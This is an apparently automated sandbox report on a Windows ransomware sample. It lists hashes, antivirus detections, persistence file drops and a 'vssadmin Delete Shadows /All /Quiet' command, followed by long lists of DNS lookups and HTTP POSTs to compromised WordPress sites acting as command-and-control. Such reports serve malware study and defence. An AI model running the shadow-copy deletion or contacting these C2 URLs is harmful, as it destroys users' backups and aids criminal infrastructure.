Analysis Date2015-10-05 07:48:47
MD5553a5a1838a4c1f283fa0d53c60da08c
SHA13fdd37b468412e240d36940dc8b756e29e79965e

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 2b48bc9f133ff034224e1f915fc1906e sha1: 441e1a3d119461ac4a49ada6c70f00f87a07c0e2 size: 138240
Section.rdata md5: d260604785470e7af2e66442ad37c763 sha1: 3840d71fd35b068423bb8187cfa791c6fc1a148c size: 12288
Section.data md5: 9bc396feb2bd0b7e07558eb461851fe5 sha1: fe0cc2415ecd178a386325144adfcc20314aa531 size: 25600
Section.rsrc md5: 4b5dec3366d72837dde85ee3cd8ec250 sha1: 2671a13690a5e4d3f5f49e938f477624a0327672 size: 93696
Timestamp2015-09-17 09:32:56
PackerMicrosoft Visual C++ ?.?
PEhashb9087859ae76a497ebd847b97baad04feeab2930
IMPhashd923ac30ec7bd69824538354f5bc31e7
AVRisingno_virus
AVMcafeeno_virus
AVAvira (antivir)no_virus
AVTwisterno_virus
AVAd-AwareGen:Variant.Zusy.162361
AVAlwil (avast)no_virus
AVEset (nod32)Win32/Kryptik.DYCV
AVGrisoft (avg)Crypt_r.TI
AVSymantecno_virus
AVFortinetW32/Injector.CIUZ!tr
AVBitDefenderGen:Variant.Zusy.162361
AVK7Trojan ( 004ce5441 )
AVMicrosoft Security EssentialsWorm:Win32/Gamarue.AU
AVMicroWorld (escan)Gen:Variant.Zusy.162361
AVMalwareBytesRansom.Winlock
AVAuthentiumW32/Agent.XL.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusno_virus
AVEmsisoftGen:Variant.Zusy.162361
AVZillya!no_virus
AVKasperskyTrojan-Ransom.Win32.Cryptodef.yur
AVTrend Microno_virus
AVCAT (quickheal)Ransom.Crowti.A4
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Zusy.162361
AVArcabit (arcavir)Gen:Variant.Zusy.162361
AVClamAVno_virus
AVDr. WebTrojan.DownLoader16.31313
AVF-SecureGen:Variant.Zusy.162361
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates ProcessC:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates FileC:\6ff06165\6ff06165.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process-k netsvcs
Creates Processvssadmin.exe Delete Shadows /All /Quiet

Process
↳ -k netsvcs

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSeugeniobonato.com
Winsock DNSevolvingcareers.co.uk
Winsock DNSglamkey.com
Winsock DNSeshraqatee.com
Winsock DNSfundmymission.org
Winsock DNSfocusmusicktv.com
Winsock DNShhydrovac.ca
Winsock DNSfan-out.com
Winsock DNScurlmyip.com
Winsock DNSgosmarttec.com
Winsock DNSeffectpublications.com
Winsock DNSdr4greatsmiles.com
Winsock DNSfabconcepts.net
Winsock DNSgeopowercables.com
Winsock DNSfoundersomaha.net
Winsock DNSeastriverpartners.org
Winsock DNSerointernet.com
Winsock DNSmyexternalip.com
Winsock DNSftpsecurityservices.com
Winsock DNSelitefitnessproduct.com
Winsock DNSdoodkonijn.com
Winsock DNSfiiwin.com
Winsock DNSepslegal.co.uk
Winsock DNSfenonsilver.com
Winsock DNSip-addr.es
Winsock DNSentriflex.com
Winsock DNSenyinnaerengwa.com
Winsock DNSfortunesolutions.co.in
Winsock DNSewineco.com
Winsock DNSeurope-academy.net
Winsock DNSexternalbatterycase.com
Winsock DNSdrsrusso.com
Winsock DNSfreepolyclinic.com
Winsock DNSgeorgiainjurycenters.com
Winsock DNSessayspro.com
Winsock DNSemployance.com
Winsock DNSdulichmuadong.com
Winsock DNSg6securitysystems.com
Winsock DNSgiorgioparquettes.com
Winsock DNSforwriteabouteverything.com
Winsock DNSeliasgreencondo.com
Winsock DNShagginhosp.com
Winsock DNSemceebook.com
Winsock DNSh3inmotion.com
Winsock DNSfondazioneciampi.org
Winsock DNSfontainebleau-miami.com
Winsock DNSdrrebeccafountain.com
Winsock DNShanjou-kanban.net
Winsock DNSgembeauty.net
Winsock DNSfiftyschmifty.com
Winsock DNSggal.com.ng
Winsock DNSgreenevap.com
Winsock DNSessayhub.org
Winsock DNSgaiga.net

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates FilePIPE\lsarpc

Network Details:

DNSip-addr.es
Type: A
188.165.164.184
DNSmyexternalip.com
Type: A
78.47.139.102
DNScurlmyip.com
Type: A
184.106.112.172
DNSfundmymission.org
Type: A
184.168.221.44
DNSenyinnaerengwa.com
Type: A
50.63.90.1
DNSerointernet.com
Type: A
68.178.254.208
DNSdoodkonijn.com
Type: A
46.252.201.1
DNSftpsecurityservices.com
Type: A
107.180.26.90
DNSeastriverpartners.org
Type: A
50.62.160.231
DNSemployance.com
Type: A
173.201.1.1
DNSelitefitnessproduct.com
Type: A
192.186.222.229
DNSfondazioneciampi.org
Type: A
66.36.163.207
DNSggal.com.ng
Type: A
52.88.9.255
DNSfiftyschmifty.com
Type: A
66.33.213.135
DNSgeopowercables.com
Type: A
107.180.44.125
DNSfoundersomaha.net
Type: A
50.63.42.1
DNSgreenevap.com
Type: A
50.63.95.1
DNSgaiga.net
Type: A
186.202.153.84
DNSeliasgreencondo.com
Type: A
23.229.143.32
DNSewineco.com
Type: A
192.186.235.6
DNShagginhosp.com
Type: A
184.168.26.1
DNSemceebook.com
Type: A
23.229.183.231
DNSentriflex.com
Type: A
52.88.9.255
DNSevolvingcareers.co.uk
Type: A
188.121.47.1
DNSeshraqatee.com
Type: A
107.180.4.26
DNSfabconcepts.net
Type: A
107.180.4.133
DNSfontainebleau-miami.com
Type: A
68.178.254.208
DNSgeorgiainjurycenters.com
Type: A
184.168.19.1
DNSfenonsilver.com
Type: A
192.232.249.212
DNSeurope-academy.net
Type: A
217.174.149.3
DNSessayhub.org
Type: A
74.124.204.146
DNSfocusmusicktv.com
Type: A
23.229.209.230
DNSfiiwin.com
Type: A
192.254.189.83
DNSeugeniobonato.com
Type: A
95.110.202.149
DNSfortunesolutions.co.in
Type: A
103.21.58.231
DNSforwriteabouteverything.com
Type: A
107.180.2.132
DNSgiorgioparquettes.com
Type: A
107.180.1.233
DNSdrsrusso.com
Type: A
97.74.215.85
DNSepslegal.co.uk
Type: A
188.121.47.1
DNSglamkey.com
Type: A
23.229.142.166
DNSeffectpublications.com
Type: A
166.62.12.1
DNShhydrovac.ca
Type: A
50.63.202.57
DNSdr4greatsmiles.com
Type: A
173.254.28.111
DNShanjou-kanban.net
Type: A
157.7.144.5
DNSh3inmotion.com
Type: A
182.50.135.128
DNSgembeauty.net
Type: A
85.92.75.157
DNSfan-out.com
Type: A
50.62.245.1
DNSgosmarttec.com
Type: A
192.232.249.212
DNSessayspro.com
Type: A
74.124.204.146
DNSdrrebeccafountain.com
Type: A
184.168.25.1
DNSg6securitysystems.com
Type: A
188.121.47.1
DNSfreepolyclinic.com
Type: A
166.62.28.84
DNSdulichmuadong.com
Type: A
182.50.134.1
DNSexternalbatterycase.com
Type: A
192.186.222.229
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?x=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://enyinnaerengwa.com/user/most-instagram-followers-non-celebrity/ap3.php?k=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://erointernet.com/ap2.php?a=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://doodkonijn.com/wp-includes/theme-compat/ap1.php?f=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?m=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eastriverpartners.org/wp-includes/theme-compat/ap5.php?d=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://employance.com/wp-includes/theme-compat/ap2.php?b=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitefitnessproduct.com/wp-admin/js/ap3.php?t=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fondazioneciampi.org/nuovo/blogs/media/ap2.php?l=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ggal.com.ng/js/vendor/ap5.php?z=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiftyschmifty.com/ap1.php?o=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?a=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?h=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?b=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gaiga.net/wp-admin/js/ap3.php?s=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eliasgreencondo.com/wp-content/cache/ap4.php?u=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?s=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?t=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://emceebook.com/bat/ap1.php?v=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entriflex.com/ndst.ng/wp-admin/images/ap5.php?a=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?g=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?n=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?n=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fontainebleau-miami.com/ap1.php?q=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?q=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fenonsilver.com/controller/catalog/ap2.php?i=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://europe-academy.net/wp-admin/user/ap2.php?m=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayhub.org/css/fonts/ap5.php?i=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://focusmusicktv.com/ap3.php?c=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiiwin.com/wp-admin/maint/ap4.php?a=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eugeniobonato.com/wp-content/uploads/js_composer/ap3.php?d=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fortunesolutions.co.in/wp-content/plugins/tinymce-advanced/css/ap5.php?d=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://forwriteabouteverything.com/wp-includes/pomo/ap4.php?u=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://giorgioparquettes.com/wp-content/uploads/2014/07/ap3.php?o=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drsrusso.com/mtqzpa/templates/ap4.php?m=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://epslegal.co.uk/js-js/ap4.php?b=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glamkey.com/errors/default/css/ap2.php?b=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://effectpublications.com/wp-includes/theme-compat/ap1.php?r=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?c=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dr4greatsmiles.com/old/wp-includes/theme-compat/ap3.php?r=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hanjou-kanban.net/wordpress/wp-content/plugins/akismet/_inc/img/ap2.php?m=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://h3inmotion.com/ap4.php?k=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gembeauty.net/wp-includes/certificates/ap2.php?j=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?h=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gosmarttec.com/assets/fonts/ap1.php?l=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayspro.com/css/fonts/ap4.php?l=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drrebeccafountain.com/Saffron/wp-content/themes/medica-lite/ap5.php?q=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://g6securitysystems.com/js/ap4.php?l=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://freepolyclinic.com/gallery/small/ap1.php?m=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dulichmuadong.com/wp-includes/fonts/ap2.php?h=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://externalbatterycase.com/wp-admin/js/ap4.php?z=vxhsljrsjuny1b
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://ip-addr.es/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://myexternalip.com/raw
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://curlmyip.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fundmymission.org/wp-includes/theme-compat/ap5.php?p=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://enyinnaerengwa.com/user/most-instagram-followers-non-celebrity/ap3.php?p=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://erointernet.com/ap2.php?f=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://doodkonijn.com/wp-includes/theme-compat/ap1.php?q=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ftpsecurityservices.com/wp-admin/images/ap2.php?d=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eastriverpartners.org/wp-includes/theme-compat/ap5.php?m=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://employance.com/wp-includes/theme-compat/ap2.php?o=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://elitefitnessproduct.com/wp-admin/js/ap3.php?y=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fondazioneciampi.org/nuovo/blogs/media/ap2.php?w=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ggal.com.ng/js/vendor/ap5.php?a=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiftyschmifty.com/ap1.php?m=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://geopowercables.com/wp-admin/user/ap1.php?d=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?x=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://greenevap.com/mtqzpa/templates/ap5.php?n=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gaiga.net/wp-admin/js/ap3.php?h=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eliasgreencondo.com/wp-content/cache/ap4.php?a=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://ewineco.com/wp-admin/network/ap5.php?b=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?o=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://emceebook.com/bat/ap1.php?s=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://entriflex.com/ndst.ng/wp-admin/images/ap5.php?h=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?m=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eshraqatee.com/wp-includes/css/ap1.php?q=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?w=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fontainebleau-miami.com/ap1.php?u=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?a=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fenonsilver.com/controller/catalog/ap2.php?r=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://europe-academy.net/wp-admin/user/ap2.php?n=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://essayhub.org/css/fonts/ap5.php?m=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://focusmusicktv.com/ap3.php?a=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fiiwin.com/wp-admin/maint/ap4.php?v=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://eugeniobonato.com/wp-content/uploads/js_composer/ap3.php?v=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fortunesolutions.co.in/wp-content/plugins/tinymce-advanced/css/ap5.php?g=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://forwriteabouteverything.com/wp-includes/pomo/ap4.php?o=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://giorgioparquettes.com/wp-content/uploads/2014/07/ap3.php?s=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://drsrusso.com/mtqzpa/templates/ap4.php?k=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://epslegal.co.uk/js-js/ap4.php?z=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://glamkey.com/errors/default/css/ap2.php?s=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://effectpublications.com/wp-includes/theme-compat/ap1.php?i=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hhydrovac.ca/ap1.php?l=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://dr4greatsmiles.com/old/wp-includes/theme-compat/ap3.php?s=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://hanjou-kanban.net/wordpress/wp-content/plugins/akismet/_inc/img/ap2.php?h=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://h3inmotion.com/ap4.php?d=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gembeauty.net/wp-includes/certificates/ap2.php?c=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://fan-out.com/wp-includes/fonts/ap5.php?f=2jcjo6y0l69x2ix
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://gosmarttec.com/assets/fonts/ap1.php?h=2jcjo6y0l69x2ix
